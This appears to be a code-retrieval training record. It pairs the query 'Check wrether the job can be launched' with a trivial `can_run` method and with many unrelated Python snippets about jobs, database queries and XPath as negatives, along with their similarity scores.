[ "0.63929814", "0.6278747", "0.6234184", "0.60798496", "0.601743", "0.59797996", "0.5893281", "0.5834644", "0.5736956", "0.5709796", "0.5683366", "0.5677564", "0.559777", "0.5590839", "0.5587835", "0.556893", "0.55425924", "0.5519106", "0.55032396", "0.54824823", "0.54682976", "0.5464532", "0.5445745", "0.5430504", "0.5429934", "0.5421744", "0.54204655", "0.54198897", "0.5409462", "0.54025435", "0.53928345", "0.5391649", "0.5383156", "0.5377929", "0.53707457", "0.53690684", "0.5360895", "0.5357442", "0.53490996", "0.53475285", "0.5346833", "0.53248", "0.53152883", "0.53138", "0.5298522", "0.5295875", "0.52869135", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.52694535", "0.52557623", "0.52438664", "0.5239574", "0.5239574", "0.52390844", "0.52231216", "0.52148074", "0.52025646", "0.5176427", "0.51708555", "0.5161712", "0.51596427", "0.5159003", "0.5159003", "0.5159003", "0.51589614", "0.5153648", "0.5153354", "0.5141807", "0.5135917", "0.5125532", "0.5122491", "0.5119271", "0.51112485", "0.5105496", "0.5096203", "0.50892127", "0.50883216", "0.50791496", "0.5079128", "0.5075979", "0.5073189", "0.50688726", "0.50595427", "0.50560147", "0.5052059", "0.5047639", "0.50393105", "0.50345093", "0.50249004" ]
0.8269762
0
Get dereference query condition. Called by dereference()
def get_defererence_query(self): return {"id": self.key}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def condition(self) -> global___Expression:", "def condition(self) -> global___Expression:", "def get_predicate(self):\n return self._predicate", "def query (node, grounding, db):\n return db.funcVal(grounding.groundNode(node))", "def condition(self) -> ExpressionNode:\n return self.__condition", "def where(self, condition):\n raise NotImplementedError(\"This should have been implemented.\")", "def query_predicate(self, p):\n self.setQuery(\"\"\"\n Select ?s ?o where {\n ?s %s ?o\n } ORDER BY (?s)\"\"\" % (p))\n\n try:\n rval = self.query()\n g = rval.convert()\n return [(x['s']['value'], x['o']['value']) for x in g['results']['bindings']]\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)", "def cond_predicate(clause):\n return car(clause)", "def predicate (self) :\n\n return self.__predicate__", "def _query(self, p, k):\n if isinstance(p, int):\n if k >= len(self._table[p]):\n return None\n return self._table[p][k]\n\n # if k > self._tree.depth(p):\n if k >= len(self._table[p.index()]):\n return None\n return self._table[p.index()][k]", "def get_query():\n return CiscoVlanIftableRelationshipQuery", "def query(self):\n return self.details[KEY_QUERY]", "def _link_for_query(self, query):\r\n results = list(query)\r\n return results[0] if results else None", "def get_basic_query_cond(column: str, val: str, query_params: dict):\n if val is not None:\n query_params[column] = val\n return 'AHJ.' + column + '=%(' + column + ')s AND '\n return ''", "def condition(self) -> str | None:\n return self._condition", "def test_predicate8(self):\n xpb = XPathBuilder()\n pred = (xpb.attr('name').equals('foo')\n .log_and(xpb.attr('x').equals('x')))\n xp = xpb.foo.bar.where(pred)\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def predicate (self, qx) :\n hg = self.head_getter\n tg = self.tail_getter\n tn = self.type_name\n result = qx (hg) [tn]\n if tg is not None :\n result = tg (result)\n return result", "def query(self):\n return self._query", "def query(self):\n return self._query", "def query(self):\n return self._query", "def query(self):\n \n return self._query", "def get_condition(self,ns=None):\n if ns is None:\n ns=self.ns\n c=self.xpath_eval(\"ns:*\")\n if not c:\n self.upgrade()\n c=self.xpath_eval(\"ns:*\")\n if not c:\n return None\n if ns==self.ns and c[0].name==\"text\":\n if len(c)==1:\n return None\n c=c[1:]\n return c[0]", "def query(self):\n return self.__query", "def _query(self, p, k):\n if k > self._tree.depth(p):\n return None\n\n if k == 0:\n return p\n\n # Find the jump-node descendant of the node and recompute the query level.\n jump = self._jump[p.index()]\n k = k + self._tree.depth(jump) - self._tree.depth(p)\n\n l = self._log[k] # k = 2^l + d\n d = k - self._pow[l]\n\n u = self._table[jump.index()][l]\n w = self._ladders[self._path[u.index()]][self._ind[u.index()] - d]\n\n return w", "def _extract_where(self, query) :\n\t\tquery = copy.copy(query)\n\t\t\n\t\t# discard the insert information\n\t\tif self.n.sparql.insert in query :\n\t\t\tdel query[self.n.sparql.insert]\n\t\t\n\t\t# discard the delete information\n\t\tif self.n.sparql.delete in query :\n\t\t\tdel query[self.n.sparql.delete]\n\t\t\n\t\t# build the where clause with outlined variables\n\t\treturn self.python_to_SPARQL_long(query)", "def check_deref_attr_func(self, node):\n options = node.options\n ast = node.ast\n declarator = ast.declarator\n attrs = declarator.attrs\n deref = attrs[\"deref\"]\n mderef = None\n ntypemap = ast.typemap\n nindirect = declarator.is_indirect()\n if declarator.get_subprogram() == \"subroutine\":\n pass\n if ntypemap.sgroup == \"void\":\n # Unable to set Fortran pointer for void\n # if deref set, error\n pass\n elif ntypemap.sgroup == \"shadow\":\n # Change a C++ pointer into a Fortran pointer\n # return 'void *' as 'type(C_PTR)'\n # 'shadow' assigns pointer to type(C_PTR) in a derived type\n # Array of shadow?\n pass\n elif ntypemap.sgroup == \"string\":\n if deref:\n mderef = deref\n elif attrs[\"len\"]:\n mderef = \"copy\"\n else:\n mderef = \"allocatable\"\n elif ntypemap.sgroup == \"vector\":\n if deref:\n mderef = deref\n else:\n mderef = \"allocatable\"\n elif nindirect > 1:\n if deref:\n raise RuntimeError(\n \"Cannot have attribute 'deref' on function which returns multiple indirections in {}\".\n format(node.decl))\n elif nindirect == 1:\n # pointer to a POD e.g. int *\n if deref:\n mderef = deref\n elif ntypemap.sgroup == \"char\": # char *\n if attrs[\"len\"]:\n mderef = \"copy\"\n else:\n mderef = \"allocatable\"\n elif attrs[\"dimension\"]:\n mderef = \"pointer\"\n else:\n mderef = options.return_scalar_pointer\n elif deref:\n raise RuntimeError(\n \"Cannot have attribute 'deref' on non-pointer in {}\".format(\n node.decl\n )\n )\n ast.declarator.metaattrs[\"deref\"] = mderef", "def test_name_ref_with_path(renderer, engine):\n class Model(bloop.new_base()):\n id = bloop.Column(bloop.Integer, hash_key=True, name='this.is.id')\n data = bloop.Column(DocumentType)\n engine.bind(base=Model)\n\n no_id = Model.id.is_(None)\n path_condition = Model.data[\"Rating\"] >= 2\n condition = no_id & path_condition\n\n expected = {\n 'ExpressionAttributeNames': {\n '#n0': 'this.is.id', '#n2': 'Rating', '#n1': 'data'},\n 'ExpressionAttributeValues': {':v3': {'N': '2'}},\n 'ConditionExpression':\n '((attribute_not_exists(#n0)) AND (#n1.#n2 >= :v3))'}\n renderer.render(condition, \"condition\")\n assert renderer.rendered == expected", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def _getSQLWhere(self, inputTable, queryMeta):\n\t\tsqlPars = {}\n\t\tinputPars = dict((p.name, p.value) for p in inputTable.iterParams())\n\t\treturn base.joinOperatorExpr(\"AND\",\n\t\t\t[cd.asSQL(inputPars, sqlPars, queryMeta)\n\t\t\t\tfor cd in self.condDescs]), sqlPars", "def get_query(self, row_id):\n return self.get(row_id).query", "def get_resource_query(self):\n pass", "def get_resource_query(self):\n pass", "def query_fetchone(self, q, param=None):\r\n try:\r\n c = self.connection.cursor()\r\n if param is None:\r\n c.execute(q)\r\n else:\r\n c.execute(q, param)\r\n self.logger.log(logger.LogLevel.DEBUG, 'database.fetchone: %s | %s' % (q, param)) \r\n return c.fetchone()\r\n except Exception as e:\r\n self.logger.log(logger.LogLevel.ERROR, 'database.fetchone: %s. %s | %s' % (e, q, param))\r\n return False", "def get_query(self):\n return self.query_class(self)", "def test_predicate12(self):\n xpb = XPathBuilder()\n pred = (xpb.attr('d').equals('e')\n .log_and(xpb.foo.where(xpb.attr('z').equals('abc'))))\n xp = xpb.a.b.c.where(pred)\n exp = '/a/b/c[@d = \"e\" and /foo[@z = \"abc\"]]'\n self.assertEqual(xp.tostring(), exp)", "def visit_query(self, query):\n return query", "def getQuery(self):\n return self._query", "def where(self, *query):\n\n if query:\n query = query[0]\n\n if not isinstance(query, BaseElement):\n raise TypeError('{0}. {1} expected'.format(query, BaseElement))\n\n if self.query is None:\n self.query = query\n\n else:\n self.query &= query\n\n result = self\n\n else:\n result = self.query\n\n return result", "def get_query():\r\n table = query_queue_table\r\n\r\n s = table.select(order_by = sa.asc(table.c.date), limit = 1)\r\n s.append_whereclause(sa.and_(*[table.c.iden != i for i in running]))\r\n r = s.execute().fetchone()\r\n\r\n if r:\r\n return r.iden, r.query\r\n else:\r\n return None, None", "def get_query(self):\r\n\r\n split = self.path_s.split(\"?\", 1)\r\n if len(split) == 1: return \"\"\r\n else: return split[1]", "def query(monitorPoint) :\n return s.query(monitorPoint)", "def predicate (self, qx) :\n lhs = qx (self.lhs)\n op = self.op\n name = op.__name__\n op = _Op_Map_.get (name, op)\n return lhs._op_call (name, op, * self.args, ** self.kw)", "def test_predicate11(self):\n xpb = XPathBuilder()\n xp = xpb.a.b.c[(xpb.attr('d') == 'e') & xpb.foo[xpb.attr('z') == 'ab']]\n exp = '/a/b/c[@d = \"e\" and /foo[@z = \"ab\"]]'\n self.assertEqual(xp.tostring(), exp)", "def give_cond(self, idx):\n return self._conds[idx]", "def give_cond(self, idx):\n return self._conds[idx]", "def __get__(self, instance, owner):\r\n try:\r\n return instance._values[self.column.column_name].getval()\r\n except AttributeError as e:\r\n return self.query_evaluator", "def condition(self, evidence):\n return self.condition2( [x for x in evidence], [evidence[x] for x in evidence] )", "def _make_find_query(query):\n try:\n query = _sympify(query)\n except SympifyError:\n pass\n if isinstance(query, type):\n return lambda expr: isinstance(expr, query)\n elif isinstance(query, Basic):\n return lambda expr: expr.match(query) is not None\n return query", "def getCondition(self):\r\n return self.controller.getCondition()", "def apply_query(self, foreign, owner, foreign_key, local_key):\n return foreign.where(foreign_key, owner().__attributes__[local_key]).first()", "def check_deref_attr_var(self, node, ast):\n declarator = ast.declarator\n attrs = declarator.attrs\n meta = declarator.metaattrs\n ntypemap = ast.typemap\n is_ptr = declarator.is_indirect()\n\n deref = attrs[\"deref\"]\n if deref is not None:\n if deref not in [\"allocatable\", \"pointer\", \"raw\", \"scalar\"]:\n raise RuntimeError(\n \"Illegal value '{}' for deref attribute. \"\n \"Must be 'allocatable', 'pointer', 'raw', \"\n \"or 'scalar'.\".format(deref)\n )\n nindirect = declarator.is_indirect()\n if ntypemap.sgroup == \"vector\":\n if deref:\n mderef = deref\n else:\n # Copy vector to new array.\n mderef = \"allocatable\"\n elif nindirect != 2:\n raise RuntimeError(\n \"Can only have attribute 'deref' on arguments which\"\n \" return a pointer:\"\n \" '{}' at line {}\".format(ast.name, node.linenumber))\n elif meta[\"intent\"] == \"in\":\n raise RuntimeError(\n \"Cannot have attribute 'deref' on intent(in) argument:\"\n \" '{}' at line\".format(ast.name, node.linenumber))\n meta[\"deref\"] = attrs[\"deref\"]\n return\n\n # Set deref attribute for arguments which return values.\n intent = meta[\"intent\"]\n spointer = declarator.get_indirect_stmt()\n if ntypemap.name == \"void\":\n # void cannot be dereferenced.\n pass\n elif spointer in [\"**\", \"*&\"] and intent == \"out\":\n if ntypemap.sgroup == \"string\":\n # strings are not contiguous, so copy into argument.\n meta[\"deref\"] = \"copy\"\n else:\n meta[\"deref\"] = \"pointer\"", "def test_predicate10(self):\n xpb = XPathBuilder()\n pred = xpb.attr('foo').equals('bar').log_or(xpb.foobar)\n xp = xpb.foo.bar.where(pred)\n exp = '/foo/bar[@foo = \"bar\" or /foobar]'\n self.assertEqual(xp.tostring(), exp)", "def test_predicate6(self):\n xpb = XPathBuilder()\n xp = xpb.foobar.where(2)\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_where_with_edge(self):\n class SomeNode(Node):\n \"\"\"Node example\"\"\"\n attr = attributes.AnyAttr(prop_name='node_name')\n\n class SomeEdge(Edge):\n \"\"\"Edge example\"\"\"\n attr = attributes.AnyAttr(prop_name='edge_name')\n\n query = (Query()\n .match(SomeNode, 'f')\n .where(SomeNode.attr == 2)\n .connected_through(SomeEdge, '_a')\n .where(SomeEdge.attr != '2')\n .with_('')\n )\n expected = '\\n'.join((\n 'MATCH (f:SomeNode)-[_a:SOMEEDGE]-(_b)',\n 'WHERE f.node_name = $a,',\n ' AND _a.edge_name <> $b',\n 'RETURN _a, _b, f',\n ))\n self.assertEqual(str(query), expected)\n\n expected = {'a': 2, 'b': '2'}\n self.assertEqual(query.get_vars(), expected)", "def query_rule(self, name, *args, **kwargs):\n return self.query(Predicate(name=name, args=args), **kwargs)", "def doQueryString(self, query) :\n\t\tqr = self.doQuery(query)['results']['bindings']\n\t\tif qr :\n\t\t\treturn qr[0].values()[0]['value']\n\t\telse :\n\t\t\treturn None", "def locate(self, column, cond_inp):\n\n try:\n return self.df_input.loc[self.df_input[column] == cond_inp]\n except Exception as e:\n print(e)", "def event_query(self, run=None, cond=None, ons=None):\n query = self.event_table[:, :]\n for i, key in enumerate([run, cond, ons]):\n if key is not None:\n query = query[(query[:, i] == key), :]\n return query", "def Q(self):\n return self._Q", "def _sql_where(self, cursor, table, prefix=None, aggregate=False):\n assert False, \"subclass responsibility\"", "def test_query_ot(self):\n term = next(self.OntTerm.query(label='deep'))\n assert term, 'oops?'", "def _query(self, p, k):\n raise NotImplementedError(\"This method must be implemented by the subclass\")", "def query(self, q):\r\n if self.is_empty:\r\n return None\r\n current = self.root\r\n i = 0\r\n while i < len(q):\r\n index = ord(q[i]) - 65 + 1\r\n if current.link[index] is not None:\r\n current = current.link[index]\r\n else:\r\n return None\r\n i += 1\r\n return current.highest_freq.string", "def simpleEqualsQuery(fluiddb, about):\n fluiddb.objects.get('fluiddb/about = \"%s\"' % about)", "def path_condition(self) -> Exp:\n return EAll(self.path_conditions())", "def query(self, query):\n cursor = self.database.cursor()\n cursor.execute(query)\n # If it's a query that's expected to return a value (EG: SELECT)\n if query.strip().lower().startswith('select'): return cursor.fetchall()", "def query_link_attribute(self, attribute, operation=None, value=None, link_type=None):\n link_attribute_dict = {}\n for name, link in self.links(link_type):\n try:\n if operation == None and value == None:\n link_attribute_dict[name] = getattr(link, attribute)\n else:\n link_attribute = getattr(link, attribute)\n if operation(link_attribute, value):\n link_attribute_dict[name] = link_attribute\n except AttributeError:\n pass\n return pd.Series(link_attribute_dict)", "def test_predicate7(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar[(xpb.attr('name') == 'foo') & (xpb.attr('x') == 'x')]\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def conditional(self) -> global___Statement.Conditional:", "def test_query_expression_parsing(self):\r\n query1 = self.table.filter(self.table.column('test_id') == 5)\r\n assert len(query1._where) == 1\r\n\r\n op = query1._where[0]\r\n assert isinstance(op.operator, operators.EqualsOperator)\r\n assert op.value == 5\r\n\r\n query2 = query1.filter(self.table.column('expected_result') >= 1)\r\n assert len(query2._where) == 2\r\n\r\n op = query2._where[1]\r\n assert isinstance(op.operator, operators.GreaterThanOrEqualOperator)\r\n assert op.value == 1", "def _is_query(act: Message):\n k = 'is_search_query'\n return k in act and act[k]", "def walk(predicate, cursor):\n return (c for c in cursor.walk_preorder() if predicate(c))", "def getQueryAnchor(self, context, metatype=None):\n for o in list(context.aq_chain):\n if IExtropyTracking.providedBy(o):\n if metatype is None:\n return o\n elif hasattr(o,'meta_type') and metatype == o.meta_type:\n return o\n return getToolByName(self, 'portal_url').getPortalObject()", "def where(condition):\n return partial(filter, condition)", "def activate_predicate(self):\n pass", "def query(d, key, val, operator='==', keynotfound=None):\n d = itertools.tee(d, 2)[1]\n if callable(operator):\n if not can_take_n_args(operator, 2):\n raise ValueError('operator must take at least 2 arguments')\n op = operator\n else:\n op = OPERATORS.get(operator, None)\n if not op:\n raise ValueError('operator must be one of %r' % OPERATORS)\n\n def try_op(func, x, y):\n try:\n result = func(x, y)\n return result\n except Exception:\n return False\n\n return (x for x in d if try_op(op, x.get(key, keynotfound), val))", "def query_device_handle(runtime, query_str):\r\n devices_manager = runtime.devices_manager\r\n dname, sname = query_str.split('.')\r\n\r\n dev = devices_manager.find_devices(dname)\r\n if dev is None:\r\n print(f'[Debug] Query {dname} from DevicesManager and got None.', file=sys.stderr)\r\n raise ValueError(f'Device {dname} not in database.')\r\n\r\n ret = dev.get_status_value(sname)\r\n if ret is None:\r\n print(f'[Debug] Query {dname}.{sname} from DevicesManager and got None.', file=sys.stderr)\r\n raise ValueError(f'Status {dname}.{sname} not in database.')\r\n\r\n return ret", "def predicate (self, qx) :\n try :\n rhs = qx (self.rhs)\n except Exception :\n rhs = self.rhs\n return _Aggr_ (qx, rhs, self.op_name)", "def query(self) -> Optional[str]:\n return pulumi.get(self, \"query\")", "def get_query(self, minimal: bool = False) -> Optional[str]:\n if minimal:\n return self.minimal_query\n return self.query", "def _query_and_fetchone(self, query):\n with self._connect() as conn:\n cur = conn.cursor()\n cur.execute(query)\n result = cur.fetchone()\n\n return result", "def conditional_value(self) -> global___Expression.ConditionalOperator:", "def prove(self, query, context):\n return self.askOne(query, context) != None", "def query(mdx_stmt):", "def passes(self, attribute, key, dictionary):\n return (\n config(\"database.DB\")\n .connection(self.connection)\n .table(self.table)\n .where(self.column, attribute)\n .first()\n is None\n )", "def simple_query(proposition):\n result = agent.kb.ask(expr(proposition))\n if result == None:\n print \"{0}: Unknown!\".format(proposition)\n else:\n print \"{0}: {1}\".format(proposition,result)", "def get(self, table, field, condition, *parameters, **kwparameters):\n data = self.select(table, field, condition, *parameters, **kwparameters)\n return data[0] if data else []", "def smart_query(collection, condition):\r\n smart_condition = list()\r\n for condition_key, condition_value in condition.iteritems():\r\n if isinstance(condition_value, dict):\r\n # We do not optimize complicate conditions.\r\n smart_condition.append({condition_key: condition_value})\r\n else:\r\n smart_condition.append({\"$or\": [\r\n {condition_key: condition_value},\r\n {condition_key: None},\r\n {condition_key: {\"$exists\": False}}\r\n ]})\r\n query_condition = {\"$and\": smart_condition}\r\n debug.print_as_json(query_condition)\r\n return query(collection, query_condition)", "def test_predicate4(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar.where(xpb.attr('name').not_equals('abc'))\n xp = xp.where(xpb.attr('x').equals('foo'))\n exp = '/foo/bar[@name != \"abc\"][@x = \"foo\"]'\n self.assertEqual(xp.tostring(), exp)", "def trackingQuery(self, node, REQUEST=None, **kw):\n node = self.getQueryAnchor(node)\n return self.localQuery(node, REQUEST, **kw)", "def query(self, point):\n if self.root is None:\n raise Exception('tree must be built first')\n return self.root.query(point)", "def visit_not_query(self, query):\n return query", "def test_where_with_node(self):\n class SomeNode(Node):\n \"\"\"Node example\"\"\"\n attr = attributes.AnyAttr(prop_name='name')\n\n query = (Query()\n .match(SomeNode, 'f')\n .where(SomeNode.attr == 2)\n .where('exists(f.something)')\n .where(SomeNode.attr != '2')\n )\n expected = '\\n'.join((\n 'MATCH (f:SomeNode)',\n 'WHERE f.name = $a',\n ' AND exists(f.something)',\n ' AND f.name <> $b',\n 'RETURN f',\n ))\n self.assertEqual(str(query), expected)\n\n expected = {'a': 2, 'b': '2'}\n self.assertEqual(query.get_vars(), expected)", "def query(self):\r\n raise NotImplementedError", "def doQueryURI(self, query) :\n\t\tqr = self.doQuery(query)\n\t\treturn qr['results']['bindings'][0]" ]
[ "0.5894116", "0.5894116", "0.5690017", "0.56574285", "0.5489223", "0.53180575", "0.52761585", "0.5190257", "0.51548445", "0.5123056", "0.5117761", "0.5093818", "0.5087869", "0.50837064", "0.5081821", "0.50449884", "0.5042481", "0.5036811", "0.5036811", "0.5036811", "0.50075585", "0.49784315", "0.4957777", "0.49568453", "0.49500743", "0.49165016", "0.4912225", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4908281", "0.4892165", "0.48806044", "0.48710257", "0.48710257", "0.48708427", "0.4861586", "0.48576844", "0.48573864", "0.48346925", "0.48316717", "0.4813108", "0.48130402", "0.4806634", "0.48063117", "0.47859946", "0.47790375", "0.47790375", "0.47773248", "0.47731632", "0.4764525", "0.47576874", "0.47390744", "0.47321483", "0.47271377", "0.47246438", "0.47196883", "0.47178972", "0.47045064", "0.46981472", "0.46974462", "0.46921065", "0.46793067", "0.46791378", "0.46719965", "0.46657142", "0.46413913", "0.46381652", "0.4631314", "0.46285823", "0.462791", "0.46195158", "0.46113396", "0.46043435", "0.4589778", "0.45834416", "0.45809096", "0.4576282", "0.45744106", "0.457273", "0.45680565", "0.45578462", "0.45562863", "0.45537704", "0.45473346", "0.45455325", "0.45399436", "0.45325327", "0.4531119", "0.4527774", "0.45222765", "0.45206332", "0.45107147", "0.45021734", "0.45010862", "0.4499598", "0.449755", "0.44964266" ]
0.49621782
22
Check wrether the job can be launched
def can_run(self): return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lantern_check():\n if not app.config.get(\"ENABLE_LANTERN\", False):\n print \"[{x}] Not checking Lantern jobs - interface disabled\".format(x=dates.now())\n return\n print \"[{x}] Checking Lantern jobs\".format(x=dates.now())\n LanternApi.check_jobs()", "def check_env():\n job_file = [\n x for x in sys.argv if x.endswith('py') and not x.endswith('__main__.py')]\n spark_submit = True if len(job_file) > 0 else False\n return spark_submit", "def can_run(self):\n\t\treturn self._start is None", "def _require_running(self):\n if self._state != JobManagerState.RUNNING:\n raise JobManagerInvalidStateError('job manager is not running')", "def check(args, session: Session = NEW_SESSION) -> None:\n if args.allow_multiple and not args.limit > 1:\n raise SystemExit(\"To use option --allow-multiple, you must set the limit to a value greater than 1.\")\n if args.hostname and args.local:\n raise SystemExit(\"You can't use --hostname and --local at the same time\")\n\n query = select(Job).where(Job.state == JobState.RUNNING).order_by(Job.latest_heartbeat.desc())\n if args.job_type:\n query = query.where(Job.job_type == args.job_type)\n if args.hostname:\n query = query.where(Job.hostname == args.hostname)\n if args.local:\n query = query.where(Job.hostname == get_hostname())\n if args.limit > 0:\n query = query.limit(args.limit)\n\n alive_jobs: list[Job] = [job for job in session.scalars(query) if job.is_alive()]\n\n count_alive_jobs = len(alive_jobs)\n if count_alive_jobs == 0:\n raise SystemExit(\"No alive jobs found.\")\n if count_alive_jobs > 1 and not args.allow_multiple:\n raise SystemExit(f\"Found {count_alive_jobs} alive jobs. Expected only one.\")\n if count_alive_jobs == 1:\n print(\"Found one alive job.\")\n else:\n print(f\"Found {count_alive_jobs} alive jobs.\")", "def isJobRunning ( self ):\n #cmd = \"qstat \" + str(self.jobid)\n \n #magicString='Unknown Job Id' ### magicString _might_ need to be changed if Torque version changes\n #(output, error) = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\n if self.ofile_exists(): #output.find(magicString) >=0 or redhawkStatsRe.search(output):\n self.status = \"finished\"\n return False\n \n\n return True", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def validate_ready_to_run(self):\n super(FlexibleMaster, self).validate_ready_to_run()\n if len(self._job_name_lst) < len(self._step_function_lst) + 1:\n raise ValueError(\"Not enough job names set.\")\n elif len(self._job_name_lst) > len(self._step_function_lst) + 1:\n raise ValueError(\"Not enough step functions set.\")", "def job_exists(self, job):\n\n with open(os.devnull, 'w') as devnull:\n result = subprocess.call(self.cli + [PlatformJenkinsJavaCLI.GET_JOB, job.name], stdout=devnull)\n\n return result == 0", "def _setJob_checkShot(shotPath):\n\tvalid = True\n\n\tjobPath = os.path.split(shotPath)[0]\n\t#jobDataDir = os.path.join(jobPath, os.environ['IC_METADATA'])\n\tshotDataDir = os.path.join(shotPath, os.environ['IC_METADATA'])\n\n\t# if not os.path.isdir(jobDataDir):\n\t# \tvalid = False\n\n\tif not os.path.isdir(shotDataDir):\n\t\tvalid = False\n\n\treturn valid", "def _check_for_finished_job(self):\n raise NotImplementedError", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def check_sp_job(self,\n label: str,\n job: 'JobAdapter',\n ):\n if 'mrci' in self.sp_level.method and job.level is not None and 'mrci' not in job.level.method:\n # This is a CCSD job ran before MRCI. Spawn MRCI\n self.run_sp_job(label)\n elif job.job_status[1]['status'] == 'done':\n self.post_sp_actions(label,\n sp_path=os.path.join(job.local_path_to_output_file),\n level=job.level,\n )\n # Update restart dictionary and save the yaml restart file:\n self.save_restart_dict()\n if self.species_dict[label].number_of_atoms == 1:\n # save the geometry from the sp job for monoatomic species for which no opt/freq jobs will be spawned\n self.output[label]['paths']['geo'] = job.local_path_to_output_file\n else:\n self.troubleshoot_ess(label=label,\n job=job,\n level_of_theory=job.level,\n )", "def test_check_opt_crashed(self):\n self.assertEqual(check_opt(self.jobset2.job), 'ocrashed')", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def test_matching_jobs_existing(self):\n self.assertEquals(\n self.query_api.get_matching_jobs(\n \"try\", \"146071751b1e\",\n 'Linux x86-64 try build'), json.loads(JOBS_SCHEDULE))", "def is_runnable(self):\n \n if len(target_tasks) < 1: \n return False\n # check task names?\n \n if self.run_folder is None or \\\n not os.path.exists(self.run_folder) or \\\n not os.path.exists(os.path.join(self.run_folder, self.run_id, 'SampleSheet.csv')):\n return False\n \n return True", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def jobserver_supported():\n return _MakeJobServer._singleton is not None", "def is_runnable(self):\n return self.state == self.STATE_INIT and not self.require", "def _is_working():\n global _worker\n return _worker is not None and _worker.is_alive()", "def checkRunning(procname):\n return procdata.checkRunning(procname)", "def check_availability(self):\n pass", "def _check_job_status(self):\n try:\n status = self.ee2.check_job_canceled({\"job_id\": self.job_id})\n except Exception as e:\n self.logger.error(\n f\"Warning: Job cancel check failed due to {e}. However, the job will continue to run.\"\n )\n return True\n if status.get(\"finished\", False):\n return False\n return True", "def check_jobs(self):\n # New/aborted jobs\n try:\n jobs = self.sm.get_job('%', phase = 'QUEUED')\n for job in jobs:\n self._launch_job(Job(job['job']))\n res = self.sm.get_aborted_jobs()\n aborts = [x['identifier'] for x in res]\n # Completed jobs\n for t in self.threads:\n if t.isDone() or t.name in aborts:\n self.threads.remove(t)\n # Set job status to COMPLETED\n job = Job(self.sm.get_job(t.name)[0]['job'])\n if t._Future__excpt == None:\n job.set_phase('COMPLETED')\n if t._Future__result != None:\n job.set_results(t._Future__result) \n status = True\n else:\n job.set_phase('ERROR')\n job.set_error_summary(str(t._Future__excpt[1]).replace(\"'\", \"\"))\n status = False\n job.set_end_time(datetime.utcnow().isoformat())\n self.sm.update_job(job = job, completed = status)\n except Exception, e:\n print \"Error:\", e", "def is_running(self,timeout=0):\n\n # wait for them to start\n import time\n st = time.time()\n still_waiting = 1\n while still_waiting:\n try:\n # Send a simple command to all workers\n # and wait till they handle it successfully\n self.exec_code(\"1==1\")\n except ClusterError:\n still_waiting = 1\n elapsed = time.time() - st\n if elapsed > timeout:\n # We've run out of time.\n return 0\n else:\n still_waiting = 0\n wait_time = time.time() - st\n # should we somehow dessiminate worker topology (ids)\n # to all machines here?\n return 1", "def is_available(self):\n try :\n p = subprocess.Popen([self.program_path, self.help_argument],stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n return p.wait() == self.help_return_code\n except OSError:\n return False", "def schedule(self, job: Job) -> bool:\n if self.num_avail_cores < job.num_cores:\n return False\n\n # Find the available cores\n num_cores_found = 0\n\n for i in range(self.num_cores):\n if self.core_status[i] == 0:\n # available\n\n self.core_status[i] = job.num_timesteps\n self.core_job_id[i] = job.id\n \n self.num_avail_cores -= 1\n num_cores_found += 1\n if num_cores_found >= job.num_cores:\n # found all the cores needed, we're done\n break\n \n return True", "def _check_results(self):\n if not 'EXECUTION OF GAMESS TERMINATED NORMALLY' in self.file_dic['output']:\n print self.job_name + \" didn't finish\"\n raise TypeError('Calculation didn\\'t finish')", "def test_cluster_jobs_script(self):\r\n\r\n qiime_config = load_qiime_config()\r\n submit_script = qiime_config['cluster_jobs_fp']\r\n\r\n if (submit_script):\r\n full_path = which(submit_script)\r\n if full_path:\r\n submit_script = full_path\r\n self.assertTrue(exists(submit_script),\r\n \"cluster_jobs_fp is not set to a valid path in qiime config: %s\" % submit_script)\r\n # check if executable\r\n self.assertTrue(access(submit_script, X_OK),\r\n \"cluster_jobs_fp is not executable: %s\" % submit_script)\r\n else:\r\n # Can't run in parallel, but not a critical error\r\n pass", "def check_running(process, min=1):\n if j.data.platform.is_linux():\n pids = get_pids(process)\n if len(pids) >= min:\n return True\n return False", "def chronos_job_is_ready(context, job_name):\n chronos_tools.wait_for_job(context.chronos_client, context.jobs[job_name]['name'])", "def run_command_check(self):\n pass", "def check_slurm_job_submission(expected_name):\n cmd = ['scontrol', 'show', 'job']\n job_id = 0\n found_job = False\n while True:\n while True:\n try:\n out = Popen(cmd, stdout=PIPE, stderr=PIPE).communicate()[0]\n break\n except:\n sleep(1)\n out = out.split('\\n')\n if 'error' in out[0]:\n sleep(1)\n msg = 'Error checking job status for {0}'.format(expected_name)\n logging.warning(msg)\n continue\n for line in out:\n for word in line.split():\n if 'JobId' in word:\n index = word.find('=') + 1\n job_id = int(word[index:])\n # continue\n if 'Name' in word:\n index = word.find('=') + 1\n if word[index:] == expected_name:\n found_job = True\n\n if found_job and job_id != 0:\n return found_job, job_id\n sleep(1)\n return found_job, job_id", "def _validate_jobs(\n self,\n check_nlst_warn: 